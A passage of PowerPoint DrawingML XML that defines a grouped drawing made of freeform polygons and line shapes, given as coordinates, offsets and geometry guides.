                  <a:gd name="T8" fmla="*/ 0 w 881"/>
                  <a:gd name="T9" fmla="*/ 383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1" h="383">
                    <a:moveTo>
                      <a:pt x="0" y="383"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="383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609" name="Group 7195"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1959625" y="1345712"/>
              <a:ext cx="1110130" cy="766518"/>
              <a:chOff x="3462" y="699"/>
              <a:chExt cx="882" cy="609"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="610" name="Freeform 4348"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3462" y="887"/>
                <a:ext cx="537" cy="421"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6267 w 6267"/>
                  <a:gd name="T1" fmla="*/ 4916 h 4916"/>
                  <a:gd name="T2" fmla="*/ 6267 w 6267"/>
                  <a:gd name="T3" fmla="*/ 1682 h 4916"/>
                  <a:gd name="T4" fmla="*/ 0 w 6267"/>
                  <a:gd name="T5" fmla="*/ 0 h 4916"/>
                  <a:gd name="T6" fmla="*/ 0 w 6267"/>
                  <a:gd name="T7" fmla="*/ 3234 h 4916"/>
                  <a:gd name="T8" fmla="*/ 6267 w 6267"/>
                  <a:gd name="T9" fmla="*/ 4916 h 49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267"/>
                  <a:gd name="T16" fmla="*/ 0 h 4916"/>
                  <a:gd name="T17" fmla="*/ 6267 w 6267"/>
                  <a:gd name="T18" fmla="*/ 4916 h 49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267" h="4916">
                    <a:moveTo>
                      <a:pt x="6267" y="4916"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6267" y="1682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6267" y="491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11" name="Freeform 4349"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3999" y="843"/>
                <a:ext cx="345" cy="465"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4030 w 4030"/>
                  <a:gd name="T1" fmla="*/ 4347 h 5426"/>
                  <a:gd name="T2" fmla="*/ 4030 w 4030"/>
                  <a:gd name="T3" fmla="*/ 1113 h 5426"/>
                  <a:gd name="T4" fmla="*/ 1989 w 4030"/>
                  <a:gd name="T5" fmla="*/ 0 h 5426"/>
                  <a:gd name="T6" fmla="*/ 0 w 4030"/>
                  <a:gd name="T7" fmla="*/ 2192 h 5426"/>
                  <a:gd name="T8" fmla="*/ 0 w 4030"/>
                  <a:gd name="T9" fmla="*/ 5426 h 5426"/>
                  <a:gd name="T10" fmla="*/ 4030 w 4030"/>
                  <a:gd name="T11" fmla="*/ 4347 h 54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030"/>
                  <a:gd name="T19" fmla="*/ 0 h 5426"/>
                  <a:gd name="T20" fmla="*/ 4030 w 4030"/>
                  <a:gd name="T21" fmla="*/ 5426 h 54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030" h="5426">
                    <a:moveTo>
                      <a:pt x="4030" y="4347"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4030" y="1113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1989" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4030" y="434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12" name="Freeform 4350"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3462" y="699"/>
                <a:ext cx="707" cy="332"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 8256"/>
                  <a:gd name="T1" fmla="*/ 2192 h 3874"/>
                  <a:gd name="T2" fmla="*/ 1989 w 8256"/>
                  <a:gd name="T3" fmla="*/ 0 h 3874"/>
                  <a:gd name="T4" fmla="*/ 8256 w 8256"/>
                  <a:gd name="T5" fmla="*/ 1682 h 3874"/>
                  <a:gd name="T6" fmla="*/ 6267 w 8256"/>
                  <a:gd name="T7" fmla="*/ 3874 h 3874"/>
                  <a:gd name="T8" fmla="*/ 0 w 8256"/>
                  <a:gd name="T9" fmla="*/ 2192 h 38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256"/>
                  <a:gd name="T16" fmla="*/ 0 h 3874"/>
                  <a:gd name="T17" fmla="*/ 8256 w 8256"/>
                  <a:gd name="T18" fmla="*/ 3874 h 38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256" h="3874">
                    <a:moveTo>
                      <a:pt x="0" y="2192"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1989" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8256" y="1682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6267" y="3874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="219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13" name="Freeform 4351"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3683" y="1041"/>
                <a:ext cx="88" cy="112"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1030"/>
                  <a:gd name="T1" fmla="*/ 0 h 1304"/>
                  <a:gd name="T2" fmla="*/ 0 w 1030"/>
                  <a:gd name="T3" fmla="*/ 1028 h 1304"/>
                  <a:gd name="T4" fmla="*/ 1030 w 1030"/>
                  <a:gd name="T5" fmla="*/ 1304 h 1304"/>
                  <a:gd name="T6" fmla="*/ 1030 w 1030"/>
                  <a:gd name="T7" fmla="*/ 277 h 1304"/>
                  <a:gd name="T8" fmla="*/ 0 w 1030"/>
                  <a:gd name="T9" fmla="*/ 0 h 13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30"/>
                  <a:gd name="T16" fmla="*/ 0 h 1304"/>
                  <a:gd name="T17" fmla="*/ 1030 w 1030"/>
                  <a:gd name="T18" fmla="*/ 1304 h 13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30" h="1304">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1030" y="1304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1030" y="277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14" name="Freeform 4352"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3689" y="1048"/>
                <a:ext cx="76" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 896"/>
                  <a:gd name="T1" fmla="*/ 0 h 1150"/>
                  <a:gd name="T2" fmla="*/ 0 w 896"/>
                  <a:gd name="T3" fmla="*/ 914 h 1150"/>
                  <a:gd name="T4" fmla="*/ 896 w 896"/>
                  <a:gd name="T5" fmla="*/ 1150 h 1150"/>
                  <a:gd name="T6" fmla="*/ 896 w 896"/>
                  <a:gd name="T7" fmla="*/ 236 h 1150"/>
                  <a:gd name="T8" fmla="*/ 0 w 896"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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6"/>
                  <a:gd name="T16" fmla="*/ 0 h 1150"/>
                  <a:gd name="T17" fmla="*/ 896 w 896"/>
                  <a:gd name="T18" fmla="*/ 1150 h 11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6" h="1150">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="914"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="1150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="23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15" name="Freeform 4353"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3689" y="1064"/>
                <a:ext cx="76" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 896 w 896"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 0 w 896"/>
                  <a:gd name="T3" fmla="*/ 0 h 241"/>
                  <a:gd name="T4" fmla="*/ 896 w 896"/>
                  <a:gd name="T5" fmla="*/ 241 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 896"/>
                  <a:gd name="T10" fmla="*/ 0 h 241"/>
                  <a:gd name="T11" fmla="*/ 896 w 896"/>
                  <a:gd name="T12" fmla="*/ 241 h 2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96" h="241">
                    <a:moveTo>
                      <a:pt x="896" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="24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16" name="Line 4354"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3689" y="1064"/>
                <a:ext cx="76" cy="2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17" name="Freeform 4355"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3689" y="1079"/>
                <a:ext cx="76" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 896 w 896"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 0 w 896"/>
                  <a:gd name="T3" fmla="*/ 0 h 241"/>
                  <a:gd name="T4" fmla="*/ 896 w 896"/>
                  <a:gd name="T5" fmla="*/ 241 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 896"/>
                  <a:gd name="T10" fmla="*/ 0 h 241"/>
                  <a:gd name="T11" fmla="*/ 896 w 896"/>
                  <a:gd name="T12" fmla="*/ 241 h 2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96" h="241">
                    <a:moveTo>
                      <a:pt x="896" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="24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18" name="Line 4356"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3689" y="1079"/>
                <a:ext cx="76" cy="2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19" name="Freeform 4357"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3689" y="1095"/>
                <a:ext cx="76" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 896 w 896"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 0 w 896"/>
                  <a:gd name="T3" fmla="*/ 0 h 241"/>
                  <a:gd name="T4" fmla="*/ 896 w 896"/>
                  <a:gd name="T5" fmla="*/ 241 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 896"/>
                  <a:gd name="T10" fmla="*/ 0 h 241"/>
                  <a:gd name="T11" fmla="*/ 896 w 896"/>
                  <a:gd name="T12" fmla="*/ 241 h 2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96" h="241">
                    <a:moveTo>
                      <a:pt x="896" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="24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20" name="Line 4358"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3689" y="1095"/>
                <a:ext cx="76" cy="2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21" name="Freeform 4359"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3689" y="1110"/>
                <a:ext cx="76" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 896 w 896"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 0 w 896"/>
                  <a:gd name="T3" fmla="*/ 0 h 241"/>
                  <a:gd name="T4" fmla="*/ 896 w 896"/>
                  <a:gd name="T5" fmla="*/ 241 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 896"/>
                  <a:gd name="T10" fmla="*/ 0 h 241"/>
                  <a:gd name="T11" fmla="*/ 896 w 896"/>
                  <a:gd name="T12" fmla="*/ 241 h 2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96" h="241">
                    <a:moveTo>
                      <a:pt x="896" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="24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22" name="Line 4360"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3689" y="1110"/>
                <a:ext cx="76" cy="2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23" name="Line 4361"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3719" y="1056"/>
                <a:ext cx="0" cy="7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24" name="Line 4362"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3734" y="1060"/>
                <a:ext cx="0" cy="7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25" name="Line 4363"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3704" y="1052"/>
                <a:ext cx="0" cy="7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26" name="Line 4364"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3750" y="1064"/>
                <a:ext cx="0" cy="7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27" name="Freeform 4365"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3526" y="999"/>
                <a:ext cx="88" cy="112"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1032"/>
                  <a:gd name="T1" fmla="*/ 0 h 1304"/>
                  <a:gd name="T2" fmla="*/ 0 w 1032"/>
                  <a:gd name="T3" fmla="*/ 1028 h 1304"/>
                  <a:gd name="T4" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T5" fmla="*/ 1304 h 1304"/>
                  <a:gd name="T6" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T7" fmla="*/ 276 h 1304"/>
                  <a:gd name="T8" fmla="*/ 0 w 1032"/>
                  <a:gd name="T9" fmla="*/ 0 h 13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32"/>
                  <a:gd name="T16" fmla="*/ 0 h 1304"/>
                  <a:gd name="T17" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T18" fmla="*/ 1304 h 13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32" h="1304">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="1304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="2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28" name="Freeform 4366"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3532" y="1006"/>
                <a:ext cx="76" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 896"/>
                  <a:gd name="T1" fmla="*/ 0 h 1148"/>
                  <a:gd name="T2" fmla="*/ 0 w 896"/>
                  <a:gd name="T3" fmla="*/ 915 h 1148"/>
                  <a:gd name="T4" fmla="*/ 896 w 896"/>
                  <a:gd name="T5" fmla="*/ 1148 h 1148"/>
                  <a:gd name="T6" fmla="*/ 896 w 896"/>
                  <a:gd name="T7" fmla="*/ 234 h 1148"/>
                  <a:gd name="T8" fmla="*/ 0 w 896"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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6"/>
                  <a:gd name="T16" fmla="*/ 0 h 1148"/>
                  <a:gd name="T17" fmla="*/ 896 w 896"/>
                  <a:gd name="T18" fmla="*/ 1148 h 11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6" h="1148">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="915"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="1148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="234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29" name="Freeform 4367"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3532" y="1022"/>
                <a:ext cx="76" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 893 w 893"/>
                  <a:gd name="T1" fmla="*/ 238 h 238"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 0 h 238"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 238 h 238"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 893"/>
                  <a:gd name="T10" fmla="*/ 0 h 238"/>
                  <a:gd name="T11" fmla="*/ 893 w 893"/>
                  <a:gd name="T12" fmla="*/ 238 h 23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93" h="238">
                    <a:moveTo>
                      <a:pt x="893" y="238"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="23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0" name="Line 4368"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3532" y="1022"/>
                <a:ext cx="76" cy="2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1" name="Freeform 4369"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3532" y="1037"/>
                <a:ext cx="76" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 893 w 893"/>
                  <a:gd name="T1" fmla="*/ 238 h 238"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 0 h 238"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 238 h 238"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 893"/>
                  <a:gd name="T10" fmla="*/ 0 h 238"/>
                  <a:gd name="T11" fmla="*/ 893 w 893"/>
                  <a:gd name="T12" fmla="*/ 238 h 23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93" h="238">
                    <a:moveTo>
                      <a:pt x="893" y="238"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="23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2" name="Line 4370"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3532" y="1037"/>
                <a:ext cx="76" cy="2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3" name="Freeform 4371"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3532" y="1053"/>
                <a:ext cx="76" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 893 w 893"/>
                  <a:gd name="T1" fmla="*/ 239 h 239"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 0 h 239"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 239 h 239"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 893"/>
                  <a:gd name="T10" fmla="*/ 0 h 239"/>
                  <a:gd name="T11" fmla="*/ 893 w 893"/>
                  <a:gd name="T12" fmla="*/ 239 h 23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93" h="239">
                    <a:moveTo>
                      <a:pt x="893" y="239"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="23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4" name="Line 4372"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3532" y="1053"/>
                <a:ext cx="76" cy="2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5" name="Freeform 4373"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3532" y="1068"/>
                <a:ext cx="76" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 893 w 893"/>
                  <a:gd name="T1" fmla="*/ 239 h 239"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 0 h 239"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 239 h 239"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 893"/>
                  <a:gd name="T10" fmla="*/ 0 h 239"/>
                  <a:gd name="T11" fmla="*/ 893 w 893"/>
                  <a:gd name="T12" fmla="*/ 239 h 23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93" h="239">
                    <a:moveTo>
                      <a:pt x="893" y="239"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="23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6" name="Line 4374"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3532" y="1068"/>
                <a:ext cx="76" cy="2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7" name="Line 4375"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3562" y="1014"/>
                <a:ext cx="0" cy="7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8" name="Line 4376"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3577" y="1018"/>
                <a:ext cx="0" cy="7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9" name="Line 4377"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3546" y="1010"/>
                <a:ext cx="0" cy="7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40" name="Line 4378"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3593" y="1022"/>
                <a:ext cx="0" cy="7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41" name="Freeform 4379"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3847" y="1085"/>
                <a:ext cx="88" cy="112"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1032"/>
                  <a:gd name="T1" fmla="*/ 0 h 1304"/>
                  <a:gd name="T2" fmla="*/ 0 w 1032"/>
                  <a:gd name="T3" fmla="*/ 1028 h 1304"/>
                  <a:gd name="T4" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T5" fmla="*/ 1304 h 1304"/>
                  <a:gd name="T6" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T7" fmla="*/ 277 h 1304"/>
                  <a:gd name="T8" fmla="*/ 0 w 1032"/>
                  <a:gd name="T9" fmla="*/ 0 h 13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32"/>
                  <a:gd name="T16" fmla="*/ 0 h 1304"/>
                  <a:gd name="T17" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T18" fmla="*/ 1304 h 13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32" h="1304">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="1304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="277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42" name="Freeform 4380"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="1092"/>
                <a:ext cx="77" cy="99"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 895"/>
                  <a:gd name="T1" fmla="*/ 0 h 1150"/>
                  <a:gd name="T2" fmla="*/ 0 w 895"/>
                  <a:gd name="T3" fmla="*/ 914 h 1150"/>
                  <a:gd name="T4" fmla="*/ 895 w 895"/>
                  <a:gd name="T5" fmla="*/ 1150 h 1150"/>
                  <a:gd name="T6" fmla="*/ 895 w 895"/>
                  <a:gd name="T7" fmla="*/ 236 h 1150"/>
                  <a:gd name="T8" fmla="*/ 0 w 895"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 1150"/>
                  <a:gd name="T17" fmla="*/ 895 w 895"/>
                  <a:gd name="T18" fmla="*/ 1150 h 11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5" h="1150">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="914"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="895" y="1150"/>
                    </a:lnTo>
                    <a:lnTo>
